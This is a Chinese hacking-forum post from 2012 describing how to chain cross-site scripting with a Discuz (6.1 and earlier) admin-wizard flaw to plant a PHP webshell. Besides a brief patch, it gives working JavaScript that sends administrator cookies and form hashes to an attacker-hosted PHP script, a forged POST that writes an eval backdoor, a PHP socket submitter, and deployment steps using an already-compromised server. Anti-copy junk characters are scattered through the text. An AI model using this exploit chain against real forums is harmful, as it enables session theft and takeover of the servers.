找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3691|回复: 0
打印 上一主题 下一主题

Discuz XSS得webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:11:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Discuz XSS得webshell2 \7 G8 R4 q# ], J, _% E$ d+ \1 G
By racle @tian6.com
6 }% D% r; i4 k' D  i* {( \/ O欢迎转帖.但请保留版权信息.
2 j& A: V" V5 C1 i* |& D受影响版本iscuz<=6.1.0,gbk+utf+big5+ K! D4 _. I4 h6 Z

3 \0 D, ^4 O: _$ _) A, O新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.' y9 `; W# }1 ?" g* H6 H8 t; z1 `0 w

$ @' ?' T6 Z+ D- L! o% j
2 A, Z! L' G3 g2 I3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
  |6 L4 \/ |, x9 w" l) E当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.
% t5 G- y# I: t: ]( ?0 E' G
& t; {0 Y9 g5 ?+ I+ h+ f2 Q  P分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
( e( q, t5 f$ K* \7 s本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS2 [6 P4 C6 K  o6 F5 R% [- p- C
* `6 c1 c* c( E& u. w5 }. R
% t0 F" R6 f3 V
----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
3 I4 D. H6 f6 v
: P- d: S3 N  X
) W% N* F1 z* Y6 e" o- h" U& @problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.
7 Q5 N, a1 x4 G2 H4 P5 j, w, @' S9 Z' B( h! n( @& _6 B
problem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
: ^1 \% M6 W; \5 B/ h4 j4 ~; g! F0 s1 C$ f
problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.5 ?/ C% \6 Z8 f% k% J$ {
7 P1 k( b( n" Z1 ~

5 u/ j6 Q9 j; {7 a下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
3 s; _0 e$ @4 U/ r5 v/ l, n$ H; X& ~7 \" A+ ]9 Q( ]
        global $runwizardfile, $runwizardhistory;
: ^( f8 x3 E8 A7 o! ^1 h
  t/ G6 C2 m( e! T        $fp = fopen($runwizardfile, 'w');" W( ]# A3 O( N0 k6 L
1 k0 S9 b7 I4 e$ ^2 b* l0 e% \
        fwrite($fp, serialize($runwizardhistory));4 d" }, r3 i% M' e, q4 j. @; v

5 g9 u+ H  J+ c+ ^& \* _        fclose($fp);. t$ z4 D8 A% @# i8 U5 ^9 `' G

- u( y  K" ?! g( l}
2 g9 G4 U  X; J  O/ [* C" k复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.
  j/ i( r' j% z3 \& C以下是修补的办法:function saverunwizardhistory() {
7 L4 f, t7 S6 Y& ]5 F# O% [( q6 U. i& x; i$ e4 H( }7 h
        global $runwizardfile, $runwizardhistory;
" C8 |: y* v0 X: \8 Q" g
5 f( }! s3 T2 |) ?9 @: z        $fp = fopen($runwizardfile, 'w');/ F6 {) @. d2 h! u' j+ Q! Q' ]

$ e/ p/ x3 I" _; i/ P: v        $s = '<?php exit;?>';
0 q4 k- C3 Y) {6 K3 p- u2 B5 Y% j$ v9 B
        $s .= serialize($runwizardhistory);' X9 l! d& K( w: d  v5 r  K

* o/ s5 U  a$ \/ d, F& ^        fwrite($fp, $s);
9 U2 Q7 Z% ~5 n; l  t0 A; m% I4 d" E8 u& t! t% g  x- O
        fclose($fp);
3 j: [. g% I. q& g
8 l1 o9 B$ u, D8 [) O) [$ d}
7 H! w8 x. R, F" _7 \& q- g4 ~; @复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
/ j& v2 K  W+ Z
. ^8 [4 z& e- p4 H) i. ^1 J% b  O+ E
! x9 H% B) Z8 c( |  J3 f  |) [8 b2 s
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------' Y: ]8 c9 `7 J" }+ l
. f7 U: P2 X5 Z$ g8 Q6 X. z0 {7 N
4 G) \4 n5 C5 ]  v3 e
  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.3 M7 X" ?, g$ T" I
$ S; ]+ Z; Z2 w3 B3 O* M
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
9 v, A" j- q5 h8 ]. p2 n$ F5 m) {2 ]7 e. z* i+ v7 E- K4 P2 d, ]
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
; W7 d3 T7 u. f7 j# B: t! l: D/ m( z: Z  y! W$ E: Y
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
; b& O; \0 M2 q! q5 f7 S
. y+ b- H, e0 s- ^# {var url="http://目标网站/admincp.php";      
* U) f! K8 M, I' ~' ]" o- E: x1 M6 D+ M" k- U6 b
/*获得cookies*/
6 `4 |$ H1 q. m' A& t6 w! Y& H' a0 f! `& [7 O% o% U+ E
function getURL(s) {
* \7 S4 o2 z/ v
# q! s6 s, k. p" @* k* ^, S% ]4 \var image = new Image();
& A1 k- R$ k/ F( `  o3 {
% f$ Y, N* a: `  _0 Fimage.style.width = 0;. N0 N" U9 e0 J2 D: o' M# l: _

( [3 z( g  q: E/ Oimage.style.height = 0;5 g/ N2 G3 N3 h4 g' s7 f: D
& I5 x8 Z' M/ i* i; W
image.src = s;6 Z* E# U- |0 B! A
4 k7 D, |' g7 s4 K
}
0 y. l8 e+ c9 ?3 P) o( G. }0 x5 z* t4 |& I4 y2 X# ?/ [
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php
( E- F6 }4 a  I- x  I- O复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
& Y! O2 H# V  x; I* U; i  L( Q复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵)
1 E) C. u. z: w; V" z# A: Y9 h6 a. s

, P0 e# V( X7 F( @获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";" ?6 j! |8 N: f, ~8 T: b' T
+ d4 X1 D% m0 w3 F6 Y% |; z4 R

4 i5 C* j7 _" C% s/ `* d; w1 n/ P5 v6 y: r4 A
/*hash*/
% ~) k$ d7 }' M# x' R( T9 f. _8 c! m
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");
1 O: w9 u% @5 k$ R1 @' t" W1 I! e- o4 f2 M& H+ r+ ^0 B
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);
6 j- q" d1 i; Z+ T0 w8 V$ \$ m/ L# x. }! Y) ?; I0 G( P
xmlHttpReq.send();
  O) h0 X5 W, y: C; y/ ?5 P0 K. s: ~! y$ I9 G8 O! P* h8 P# J9 G
var resource = xmlHttpReq.responseText;
) d- C* |/ ]2 A* w! L% |/ j; D3 c' Z$ L2 i
var numero = resource.search(/formhash/);
9 W7 U" N, b5 v  J4 V' l% Z8 g, ?. T, C, D( l- q0 }) Z  p/ t
var formhash=encodeURIComponent(resource.substr(numero+17,8));
3 `# [$ d( s! J6 ?" m( Z" s& n9 z3 l8 J, r
  _( V# h) X7 ?- Z
+ o* {/ D( L+ t* J/ Y
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
2 R% y' ]( r! d. S+ O- s# j! x5 f. U+ W4 h
xmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信 , J% l2 A3 e; z$ t

0 _+ y) q" S! `. G# OxmlHttpReq.setRequestHeader("Referer", url);
# V( x* p8 Q2 s7 H/ N* W
. {- G: s5 n+ w, i+ s3 HxmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
$ m: A  ~8 x* c) A4 [: R" x  c
8 p3 ^2 Q- T2 k# ~4 DxmlHttpReq.setrequestheader("content-length",post.length); 2 C4 ^' Z8 I1 F* j8 G. Z- D' ~
. U1 K# [  H4 \7 W
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
* R3 M/ j# y- D4 r' v$ p
( ~5 p8 }! X4 h5 B- ?5 @xmlHttpReq.send(post);//发送数据; q7 l; s$ W, V, }% ~- W3 D
复制代码这里HASH我假设正确,这样提交,也无须cookies
2 n; b) n9 v" H! }4 d, J# ?% E. {! i9 W+ p
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
2 H0 c7 z2 U# I( c2 }- o0 \# ]3 D  Q5 a+ z+ ?8 j
if (!$sock) die("$errstr ($errno)\n");
9 t* C+ N. M% `: Y7 Q  i1 ~' T0 g7 N; ?! U' D; j% y3 b
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';2 W7 j5 }, R/ P% \' C5 a9 g$ g+ t
1 @* Z5 [9 s' T% a

. K1 C- m4 R/ A+ u: E% b( r( _6 F. I# ]& s- N8 N+ z! S
fwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
8 Q0 F: G- H: O: J! j. Y( |+ B) S  _& W* D6 r
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
7 E' A( l2 j5 Z  F6 i# n. L$ {. r$ v4 G) B- @3 z  m3 c. r: y1 d
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
2 ^* x* W4 T3 v* G7 L  b% T
6 Y# j0 m% E8 S: n$ C3 D2 f/ {fwrite($sock, "Accept-Language: zh-cn\r\n");8 ]; f/ ?5 Z  T$ `' S

' F* k! ~. I5 Y7 l8 ?; R& A! W  Yfwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
$ o1 I: a2 K: ^7 W" |1 k, S# L' H( {* x8 ~& _; P
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
7 X' o- E9 `, W. k+ R! Z1 A# k5 I. [5 a( {- _
fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");$ ?  \5 W! E' Y$ Z  o& ]* ^( t; g- @
! D  S5 p2 z5 [
fwrite($sock, "Host: $url\r\n");
, i7 h4 z( e4 k% W# e0 E  I/ N
% p3 ?& s8 u; P: q2 ?. x* Pfwrite($sock, "Content-Length: ".strlen($data)."\r\n");8 M. [. Y& _) }0 K8 J+ h1 g1 |
: q8 L, Y; h# B, W
fwrite($sock, "Connection: Keep-Alive\r\n");9 b6 R! V9 B% L4 g7 J, @! S

) E! f( r/ ^7 m" F' J: P) V9 Afwrite($sock, "Cache-Control: no-cache\r\n");
' n5 T9 R& l1 X( j
7 d; B1 m7 R1 b) h& f% ufwrite($sock, "Cookie:".$cookies."\r\n\r\n");6 q, H( f" s6 W4 w' U) M

0 l. F) R+ P. y; s  `5 Qfwrite($sock, $data);: |8 o8 J, v% F4 Y8 }: j1 }! D* G
1 w' D: }1 z% \7 G3 F

/ L$ j4 A8 B% n# m
: F3 e( l5 P8 H. r  f+ t5 }$headers = "";
* P- l; k. ~, e: M7 A. n' p! d- S  r# m) R2 Y. h) x" {
while ($str = trim(fgets($sock, 4096)))
# {( o! |. t2 D; v' S6 R  k- _& \
     $headers .= "$str\n";
0 s8 I" p0 ~/ Q8 [1 }& J
7 h( b1 }% ?, Z5 X8 p0 C  r) }echo "\n";; o& X& `+ Z. U3 G% o

2 n3 [0 h, n: p( q$body = "";6 S( b" ^& j  H+ W5 g" w

0 Y- m* ?' H/ Y: s) Z* L$ K, Swhile (!feof($sock))7 r1 |& `9 K2 Y  C- B. d" E
& h# J' T% P: a4 B( X0 F* T
     $body .= fgets($sock, 4096);
4 j* x. X# U! J" `
0 o) F( B2 B; ~$ S, @8 [0 M- @fclose($sock);
9 h* d! r, K6 j, d6 d
% U  {8 }9 d6 j/ Iecho $body;
- T: p$ n- h; K7 f" [5 ?复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
: j3 R3 Y. g' s8 w8 ^0 h
+ t3 C* y9 T; R( d; \2 v6 }0 O" v
/ a+ h2 k3 C8 t( x0 p. K-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
( s/ }/ W7 e. ^5 Z& U
$ w$ s2 }# V8 }% K, ^% @; s) i# P; O! X5 H
1HP SOCKET利用方法首先打开racle.js! Z8 C' f8 y1 R9 s% ?9 B
: Y! ?" W# P" l
var url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home
7 d; q" a7 {5 U) k7 j+ P) d2 \, R5 ~% N. E, W: y( _8 g6 B0 I: ~& e2 y

* d! ]! q( d0 U1 K% n
8 s0 ~! [" p$ {9 u* A1 S然后打开racle@tian6.php
* |+ ]# U  s! I9 p( Z/ Q- c3 m9 a: B; ^6 s# f% `1 `
$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com
, t: S: P5 ~( n
; v7 x/ X/ A/ Q: r- w: g/ K
; v) s* a2 L! F# n. B$ Y" [
1 m3 w0 `2 u0 N) @: e  b. v如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
) z& n- T/ U3 M" g
7 `7 I; c4 p' G0 ogetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));  e/ R" T6 M3 n' O
( l. f5 y  i# d* V. m
$ Z* L$ B& o! O4 R3 u  h
* a4 x* f% }  K: m
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
& {4 t+ A% H; P* i- y& }  Q3 r复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.9 R( I' L- Z+ H3 l2 ~; c3 g. B
9 F# H! m2 \( G5 ?6 Z+ i2 D
! |3 z* u% G. L7 L

' g: \4 R6 J1 L3 @# h如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
9 ]& a& H5 h* \9 w5 P+ K
0 T1 x7 x  ?4 d+ q/ Qvar formhash=encodeURIComponent(resource.substr(numero+17,8));
* ~, D- \: D- E* R  x
9 S3 r, c8 n9 B5 H* @, E8 G9 t  H' A  C, i7 K9 U* {. U

% `$ H$ U5 v6 q: D8 `var formhash=encodeURIComponent(resource.substr(numero+9,8));
. V# k; U/ N4 D3 S. Z* f" }; Z$ S复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.! M. Y/ k# J4 v/ U
0 U+ z* X8 z5 j2 D2 ~1 ~% r7 y8 }
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
& T9 D( s1 i, D2 a+ Q+ ~4 F2 L8 |2 i: x
如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点." w% E3 Q3 P) M8 J( H/ r
( S9 S  @2 Y% m! L4 L( }4 P- H0 k; T
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.1 Y' d9 Y$ V& y1 l/ o9 K4 j
0 A5 t5 }/ N4 r! U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表